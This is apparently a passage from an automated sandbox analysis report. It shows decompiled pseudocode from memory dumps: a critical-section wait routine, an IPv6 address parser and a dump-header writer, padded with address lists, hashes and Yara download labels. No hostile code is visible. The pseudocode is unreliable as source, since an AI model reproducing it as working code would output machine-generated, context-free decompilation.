							E02533F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x25c20c0;
								if(_t85 != 0x25c20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0256217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02533F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                    0x0250ec56
                                                                                                                                                    0x0250ec56
                                                                                                                                                    0x0250ec56
                                                                                                                                                    0x0250ec5c
                                                                                                                                                    0x0250ec64
                                                                                                                                                    0x025423e6
                                                                                                                                                    0x025423eb
                                                                                                                                                    0x025423eb
                                                                                                                                                    0x0250ec6a
                                                                                                                                                    0x0250ec6c
                                                                                                                                                    0x0250ec6f
                                                                                                                                                    0x025423f3
                                                                                                                                                    0x025423f8
                                                                                                                                                    0x025423fa
                                                                                                                                                    0x025423fc
                                                                                                                                                    0x0250ec75
                                                                                                                                                    0x0250ec76
                                                                                                                                                    0x0250ec76
                                                                                                                                                    0x0250ec7b
                                                                                                                                                    0x0250ec7c
                                                                                                                                                    0x0250ec7e
                                                                                                                                                    0x02542406
                                                                                                                                                    0x02542407
                                                                                                                                                    0x0254240c
                                                                                                                                                    0x0254240d
                                                                                                                                                    0x0254240d
                                                                                                                                                    0x0254240d
                                                                                                                                                    0x02542414
                                                                                                                                                    0x02542417
                                                                                                                                                    0x0254241e
                                                                                                                                                    0x02542435
                                                                                                                                                    0x02542438
                                                                                                                                                    0x0254243c
                                                                                                                                                    0x0254243f
                                                                                                                                                    0x02542442
                                                                                                                                                    0x02542443
                                                                                                                                                    0x02542446
                                                                                                                                                    0x02542449
                                                                                                                                                    0x02542453
                                                                                                                                                    0x02542455
                                                                                                                                                    0x0254245b
                                                                                                                                                    0x0254245b
                                                                                                                                                    0x0250eb99
                                                                                                                                                    0x0250eb99
                                                                                                                                                    0x0250eb9c
                                                                                                                                                    0x0250eb9d
                                                                                                                                                    0x0250eb9f
                                                                                                                                                    0x0250eba2
                                                                                                                                                    0x02542465
                                                                                                                                                    0x0254246b
                                                                                                                                                    0x0254246d
                                                                                                                                                    0x0250eba8
                                                                                                                                                    0x0250eba9
                                                                                                                                                    0x0250eba9
                                                                                                                                                    0x0250ebae
                                                                                                                                                    0x0250ebb3
                                                                                                                                                    0x0250ebb9
                                                                                                                                                    0x0250ebbb
                                                                                                                                                    0x02542513
                                                                                                                                                    0x02542514
                                                                                                                                                    0x02542519
                                                                                                                                                    0x0254251b
                                                                                                                                                    0x0250ec2a
                                                                                                                                                    0x0250ec2d
                                                                                                                                                    0x0250ec33
                                                                                                                                                    0x0250ec36
                                                                                                                                                    0x0250ec3a
                                                                                                                                                    0x0250ec3e
                                                                                                                                                    0x0250ec40
                                                                                                                                                    0x0250ec47
                                                                                                                                                    0x0250ec47
                                                                                                                                                    0x0250ec40
                                                                                                                                                    0x024e22c6
                                                                                                                                                    0x0250ebc1
                                                                                                                                                    0x0250ebc1
                                                                                                                                                    0x0250ebc5
                                                                                                                                                    0x0250ec9a
                                                                                                                                                    0x0250ec9a
                                                                                                                                                    0x0250ebd6
                                                                                                                                                    0x0250ebd6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0250ebbb
                                                                                                                                                    0x02542477
                                                                                                                                                    0x0254247c
                                                                                                                                                    0x02542486
                                                                                                                                                    0x0254248b
                                                                                                                                                    0x02542496
                                                                                                                                                    0x0254249b
                                                                                                                                                    0x0254249d
                                                                                                                                                    0x025424a0
                                                                                                                                                    0x025424a3
                                                                                                                                                    0x025424aa
                                                                                                                                                    0x025424aa
                                                                                                                                                    0x025424a5
                                                                                                                                                    0x025424a5
                                                                                                                                                    0x025424a5
                                                                                                                                                    0x025424ac
                                                                                                                                                    0x025424af
                                                                                                                                                    0x025424b0
                                                                                                                                                    0x025424b3
                                                                                                                                                    0x025424b9
                                                                                                                                                    0x025424ba
                                                                                                                                                    0x025424bb
                                                                                                                                                    0x025424c6
                                                                                                                                                    0x025424cb
                                                                                                                                                    0x025424cd
                                                                                                                                                    0x025424d0
                                                                                                                                                    0x025424d1
                                                                                                                                                    0x025424d4
                                                                                                                                                    0x025424d6
                                                                                                                                                    0x025424d9
                                                                                                                                                    0x025424d9
                                                                                                                                                    0x025424dc
                                                                                                                                                    0x025424df
                                                                                                                                                    0x025424e1
                                                                                                                                                    0x025424e7
                                                                                                                                                    0x025424e9
                                                                                                                                                    0x025424ec
                                                                                                                                                    0x025424ef
                                                                                                                                                    0x025424f2
                                                                                                                                                    0x025424f2
                                                                                                                                                    0x025424ef
                                                                                                                                                    0x025424e7
                                                                                                                                                    0x025424fa
                                                                                                                                                    0x025424ff
                                                                                                                                                    0x02542501
                                                                                                                                                    0x02542503
                                                                                                                                                    0x02542506
                                                                                                                                                    0x0254250b
                                                                                                                                                    0x0250eb8c
                                                                                                                                                    0x0250eb93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0250eb93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0250eb99
                                                                                                                                                    0x0250ec85
                                                                                                                                                    0x0250ec85
                                                                                                                                                    0x0250ec85
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 025424FA
                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0254248D
                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025424BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                    • Opcode ID: 209191c9ddf2eae26b60ecd5992e88605a16c2f25672892d4b138490d71cc452
                                                                                                                                                    • Instruction ID: fe307a207be16b2168ec90fbb93393708356550deb065990d667f569c8093e87
                                                                                                                                                    • Opcode Fuzzy Hash: 209191c9ddf2eae26b60ecd5992e88605a16c2f25672892d4b138490d71cc452
                                                                                                                                                    • Instruction Fuzzy Hash: 0F41E970A00215AFDB20DF64CC85F6ABBA9FF85724F208A49F955DB2C0D734E941CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0251FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0251FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0251EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0251EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0251685D(_t167, 4) == 0) {
								if(E0251685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0251685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0251685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E024F8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E024EDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0251EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0251EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                    0x0251fcd1
                                                                                                                                                    0x0251fcd6
                                                                                                                                                    0x0251fcd9
                                                                                                                                                    0x0251fcdc
                                                                                                                                                    0x0251fcdf
                                                                                                                                                    0x0251fce2
                                                                                                                                                    0x0251fce5
                                                                                                                                                    0x0251fce8
                                                                                                                                                    0x0251fceb
                                                                                                                                                    0x0251fced
                                                                                                                                                    0x0251fced
                                                                                                                                                    0x0251fcf3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fcfc
                                                                                                                                                    0x0251fcfe
                                                                                                                                                    0x0251fdc1
                                                                                                                                                    0x0254ecbd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eccc
                                                                                                                                                    0x0254eccc
                                                                                                                                                    0x0254ecd2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ecdf
                                                                                                                                                    0x0254ece0
                                                                                                                                                    0x0254ece4
                                                                                                                                                    0x0254eceb
                                                                                                                                                    0x0254ecee
                                                                                                                                                    0x0254eca8
                                                                                                                                                    0x0254eca8
                                                                                                                                                    0x0254ecaa
                                                                                                                                                    0x0251fd76
                                                                                                                                                    0x0251fd79
                                                                                                                                                    0x0251fdb4
                                                                                                                                                    0x0251fdb5
                                                                                                                                                    0x0251fdb6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fdb6
                                                                                                                                                    0x0251fd7e
                                                                                                                                                    0x0254ecfc
                                                                                                                                                    0x0251fe2f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fe2f
                                                                                                                                                    0x0254ed08
                                                                                                                                                    0x0254ed0f
                                                                                                                                                    0x0254ed17
                                                                                                                                                    0x0254ed1b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed1b
                                                                                                                                                    0x0251fd88
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd94
                                                                                                                                                    0x0251fd99
                                                                                                                                                    0x0251fda1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fdb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fdb0
                                                                                                                                                    0x0254ecbd
                                                                                                                                                    0x0251fdc7
                                                                                                                                                    0x0251fdcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fdd7
                                                                                                                                                    0x0251fde3
                                                                                                                                                    0x0251fe06
                                                                                                                                                    0x02531fe7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02531fef
                                                                                                                                                    0x02531ff0
                                                                                                                                                    0x02531ff4
                                                                                                                                                    0x02531ff7
                                                                                                                                                    0x02531ffa
                                                                                                                                                    0x02531ffd
                                                                                                                                                    0x02532000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ecf1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ecf1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fe06
                                                                                                                                                    0x0251fde8
                                                                                                                                                    0x0251fdec
                                                                                                                                                    0x0251fdef
                                                                                                                                                    0x0251fdf2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fdf2
                                                                                                                                                    0x0251fdcb
                                                                                                                                                    0x0251fd04
                                                                                                                                                    0x0251fd05
                                                                                                                                                    0x0254ec67
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ec6f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ec6f
                                                                                                                                                    0x0251fd13
                                                                                                                                                    0x0251fd3c
                                                                                                                                                    0x0251fd40
                                                                                                                                                    0x0254ec75
                                                                                                                                                    0x0254ec7a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ec8a
                                                                                                                                                    0x0254ec8a
                                                                                                                                                    0x0254ec90
                                                                                                                                                    0x0254ecb2
                                                                                                                                                    0x0251fd73
                                                                                                                                                    0x0251fd73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd73
                                                                                                                                                    0x0254ec95
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eca1
                                                                                                                                                    0x0254eca4
                                                                                                                                                    0x0254eca5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eca5
                                                                                                                                                    0x0254ec7a
                                                                                                                                                    0x0251fd4a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd6e
                                                                                                                                                    0x0251fd6e
                                                                                                                                                    0x0251fd71
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd71
                                                                                                                                                    0x0251fd4a
                                                                                                                                                    0x0251fd21
                                                                                                                                                    0x0252a3a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0252a3a1
                                                                                                                                                    0x0251fd36
                                                                                                                                                    0x0253200b
                                                                                                                                                    0x02532012
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02532018
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02532018
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd36
                                                                                                                                                    0x0251fe0f
                                                                                                                                                    0x0251fe16
                                                                                                                                                    0x0252a3ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0252a3b3
                                                                                                                                                    0x0252a3b3
                                                                                                                                                    0x0251fe1f
                                                                                                                                                    0x0254ed25
                                                                                                                                                    0x0254ed86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed91
                                                                                                                                                    0x0254ed95
                                                                                                                                                    0x0254ed95
                                                                                                                                                    0x0254ed9a
                                                                                                                                                    0x0254edad
                                                                                                                                                    0x0254edb3
                                                                                                                                                    0x0254edba
                                                                                                                                                    0x0254edc4
                                                                                                                                                    0x0254edc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254edcc
                                                                                                                                                    0x0254ed2a
                                                                                                                                                    0x0254ed55
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed61
                                                                                                                                                    0x0254ed66
                                                                                                                                                    0x0254ed6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed7d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed7d
                                                                                                                                                    0x0254ed30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed3c
                                                                                                                                                    0x0254ed43
                                                                                                                                                    0x0254ed4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction ID: aa0801d02d201e4a68f245a8c721a87aa7f143d138f2d1b9c599208b94b71c31
                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction Fuzzy Hash: 17919E71E0030AEFEF25CFA9C8457AEBBB4FF45308F20856AD405A7591E7304A51CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0259E9FF, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 435COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0259E9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
				signed int _v5;
				int _v12;
				signed int _v16;
				char _v20;
				int _v24;
				signed int _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v96;
				char _v100;
				void _v140;
				char _v144;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v172;
				char _v216;
				char _v220;
				void* __edi;
				void* __esi;
				void* _t231;
				signed char _t233;
				signed int _t237;
				signed int _t238;
				signed int _t244;
				short _t251;
				signed int _t253;
				signed int* _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t267;
				signed int _t271;
				intOrPtr _t281;
				signed int _t314;
				signed char _t316;
				signed int _t319;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				int _t340;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t352;
				void* _t360;
				intOrPtr* _t370;
				intOrPtr _t371;
				intOrPtr* _t372;

				_t360 = __edx;
				_t340 = 0;
				_t345 = 0xa;
				_v144 = 0;
				memset( &_v140, 0, _t345 << 2);
				_v20 = 0;
				_v220 = 0;
				E024EDFC0( &_v216, 0, 0x2c);
				_t371 = _a8;
				_t347 = 7;
				_v100 = 0;
				_t231 = memset( &_v96, 0, _t347 << 2);
				_t348 = 0;
				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_v5 = _t231;
				if(_t371 != 0) {
					_v5 = 1;
				}
				_t370 = _a4;
				_t233 =  *(_t370 + 0xcc) >> 3;
				_t380 = _t233 & 0x00000001;
				if((_t233 & 0x00000001) != 0) {
					E0259E919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
				}
				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
				_v16 =  *(_t370 + 0x80);
				if(_v5 != _t340) {
					_t42 = _t371 + 0x20; // 0x259c2d6
					_v32 = _t42;
					_t44 = _t371 + 4; // 0x5bcd335e
					_t237 =  *_t44 & 0x0000ffff;
					_v24 = _t237;
					_t238 = _t237 + 0x48;
					__eflags = _t238;
					L12:
					_v28 = _t238;
					_t372 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
					if(_t372 != _t340) {
						_t54 = _t372 + 0x48; // 0x48
						_t341 = _t54;
						_t244 = E0259E519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
						__eflags = _t244;
						_a4 = _t244;
						if(_t244 < 0) {
							L49:
							__eflags = _v12;
							if(_v12 != 0) {
								E024DF9F0(_v12);
							}
							L51:
							_t340 = 0;
							__eflags = 0;
							L52:
							if(_t372 != _t340) {
								E024EE025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
							}
							L54:
							return _a4;
						}
						__eflags = _a12 - 1;
						if(_a12 != 1) {
							 *_t372 = _v16;
							_t251 = 4;
							 *((short*)(_t372 + 0x36)) = _t251;
							 *((short*)(_t372 + 0x34)) = 1;
							_t253 = _v28;
							 *((char*)(_t372 + 0x29)) = 8;
							 *(_t372 + 0x30) = _t253;
							__eflags = _v5;
							if(_v5 != 0) {
								_t254 = _v32;
								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
								_t254[9] = 1;
								 *_t254 =  *(_t370 + 0x80);
								 *((char*)(_t372 + 0x6e)) = 1;
								 *((char*)(_t372 + 0x6f)) = 5;
								__eflags = _t254[0xb] - 8;
								if(_t254[0xb] != 8) {
									_t187 =  &(_t254[0x42]); // 0xf938e834
									_t255 =  *_t187;
								} else {
									_t186 =  &(_t254[0x44]); // 0x14538910
									_t255 =  *_t186;
								}
								 *(_t370 + 0x10) = _t255;
								E024E2340(_t341, _a8, _v24);
								L39:
								_t257 =  *(_t372 + 0x30);
								_t342 = _v16;
								__eflags = _t257 - _t342;
								if(_t257 < _t342) {
									__eflags = _t257 - 0x48;
									if(_t257 > 0x48) {
										__eflags = _t257 + _t372;
										E024EDFC0(_t257 + _t372, 0xff, _t342 - _t257);
									}
								}
								_push(0);
								_push(0);
								_push(_t342);
								_push(_t372);
								_t348 =  &_v60;
								_push( &_v60);
								_push(0);
								_push(0);
								_push(0);
								_t259 = E024DF938(_v12);
								_a4 = _t259;
								__eflags = _t259;
								if(_t259 < 0) {
									goto L49;
								} else {
									_t260 =  *(_t370 + 0xc8);
									__eflags = _t260;
									if(_t260 == 0) {
										L48:
										_t348 = _v12;
										 *(_t370 + 0x100) = 1;
										 *(_t370 + 0xd8) = 1;
										__eflags = 0;
										 *(_t370 + 0xf0) = _t342;
										 *(_t370 + 0xf4) = 0;
										 *(_t370 + 0xe8) = _t342;
										 *(_t370 + 0xec) = 0;
										 *(_t370 + 0x5c) = _v12;
										_v12 = 0;
										goto L49;
									}
									_t352 =  *(_t370 + 0xcc);
									__eflags = _t352 & 0x00000020;
									if((_t352 & 0x00000020) == 0) {
										goto L48;
									}
									__eflags = _t352 & 0x00002000;
									_t348 = 0x400;
									if((_t352 & 0x00002000) == 0) {
										_t348 = 0x100000;
									}
									_push(0x14);
									_v40 = _t260 * _t348;
									_push(8);
									_push( &_v40);
									_push( &_v60);
									_v36 = _t260 * _t348 >> 0x20;
									_t267 = E024DFC48(_v12);
									_a4 = _t267;
									__eflags = _t267;
									if(_t267 < 0) {
										goto L49;
									} else {
										goto L48;
									}
								}
							}
							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
							 *_t341 = 0xc0010000;
							_t271 =  *(_t370 + 0x10);
							__eflags = _t271 - 2;
							if(_t271 != 2) {
								__eflags = _t271 - 3;
								if(_t271 != 3) {
									_v48 = 0;
									_v44 = 0;
									E024F2954(1, _t372,  &_v48);
									 *(_t341 + 0x10) = _v48;
									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
									L34:
									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
									 *((intOrPtr*)(_t341 + 8)) = _v160;
									 *((intOrPtr*)(_t341 + 0x18)) = E02524FC0(_v84, _v80, _v140, 0);
									 *((intOrPtr*)(_t341 + 0x1c)) = E02524FC0(_v76, _v72, _v140, 0);
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
									 *((char*)(_t372 + 0x6e)) = 1;
									 *((char*)(_t372 + 0x6f)) = 5;
									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
									 *(_t372 + 0x170) =  *(_t370 + 0x10);
									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
									 *((intOrPtr*)(_t372 + 0x90)) = 1;
									 *(_t372 + 0x8c) = 1;
									 *((intOrPtr*)(_t372 + 0x94)) = 4;
									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
									_t163 = _t372 + 0x178; // 0x178
									E024E2340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
									E024E2340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
									_t169 = _t372 + 0xa8; // 0xa8
									E0259E649(0, _t370, _t372, _t169);
									_t170 = _t372 + 0x160; // 0x160
									E024FB2FA(_v16, 0, _t170);
									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
